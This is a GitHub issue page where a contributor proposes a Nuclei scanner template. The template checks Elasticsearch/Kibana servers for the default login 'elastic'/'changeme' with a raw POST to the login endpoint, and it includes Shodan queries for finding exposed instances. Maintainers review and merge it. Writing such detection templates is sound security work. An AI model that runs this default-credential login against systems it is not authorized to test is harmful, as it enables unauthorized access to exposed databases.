Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

elasticsearch default credentials #7721

Closed
omranisecurity opened this issue Jul 18, 2023 · 3 comments · Fixed by #7754
Closed

elasticsearch default credentials #7721

omranisecurity opened this issue Jul 18, 2023 · 3 comments · Fixed by #7754
Assignees
@princechaddha @DhiyaneshGeek
Labels
Done Ready to merge nuclei-template Nuclei template contribution

Comments

@omranisecurity
Copy link
Contributor

omranisecurity commented Jul 18, 2023
edited
Loading

Template Information:

Reference :
- https://www.alibabacloud.com/blog/what-is-the-default-username-and-password-for-elasticsearch_599610

Nuclei Template:

id: elasticsearch-default-credentials

info:
  name: elasticsearch default credentials
  author: Mohammad Reza Omrani | @omranisecurity
  severity: high
  description: Elasticsearch default credentials were discovered.
  reference: https://www.alibabacloud.com/blog/what-is-the-default-username-and-password-for-elasticsearch_599610
  tags: default-login, default-credentials, elasticsearch, elastic
  metadata:
    shodan-query:
      - http.title:"Elastic"
      - http.favicon.hash:1328449667
    max-request: 5

http:
  - raw:
      - |
        POST /internal/security/login HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows; Windows NT 10.1; Win64; x64; en-US) Gecko/20100101 Firefox/49.5
        Referer: {{BaseURL}}/login
        Content-Type: application/json
        kbn-version: 8.1.2
        x-kbn-context: %7B%22name%22%3A%22security_login%22%2C%22url%22%3A%22%2Flogin%22%7D
        Origin: {{BaseURL}}
        
        {"providerType":"basic","providerName":"basic","currentURL":"{{BaseURL}}/login","params":{"username":"{{username}}","password":"{{password}}" }}

    payloads:
      username:
        - elastic
      password:
        - changeme
    attack: pitchfork

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - 'Set-Cookie: sid='
          - 'kbn-license-sig:'

      - type: status
        status:
          - 200

Screenshot from 2023-07-20 16-29-12
@omranisecurity omranisecurity added the nuclei-template Nuclei template contribution label Jul 18, 2023
@DhiyaneshGeek DhiyaneshGeek self-assigned this Jul 18, 2023
@omranisecurity omranisecurity changed the title [nuclei-template] elasticsearch default credentials Jul 18, 2023
@omranisecurity
Copy link
Contributor Author

@princechaddha
How long does it take to check the template?

@DhiyaneshGeek
Copy link
Member

Hi @omranisecurity i'm looking into this right now , should provide you in a min

Thanks !

@DhiyaneshGeek DhiyaneshGeek linked a pull request Jul 24, 2023 that will close this issue
Create elasticsearch-default-login.yaml #7754
Merged
2 tasks
@DhiyaneshGeek
Copy link
Member

Hi @omranisecurity i have raised PR #7754 , could you share some information for setting up a vulnerable set-up like docker or set-up instructions

Thank you 😄

@DhiyaneshGeek DhiyaneshGeek added the Done Ready to merge label Jul 24, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@princechaddha princechaddha

@DhiyaneshGeek DhiyaneshGeek

Labels
Done Ready to merge nuclei-template Nuclei template contribution
Projects
None yet
Milestone
No milestone
Development

Successfully merging a pull request may close this issue.

Create elasticsearch-default-login.yaml projectdiscovery/nuclei-templates
3 participants
@princechaddha @DhiyaneshGeek @omranisecurity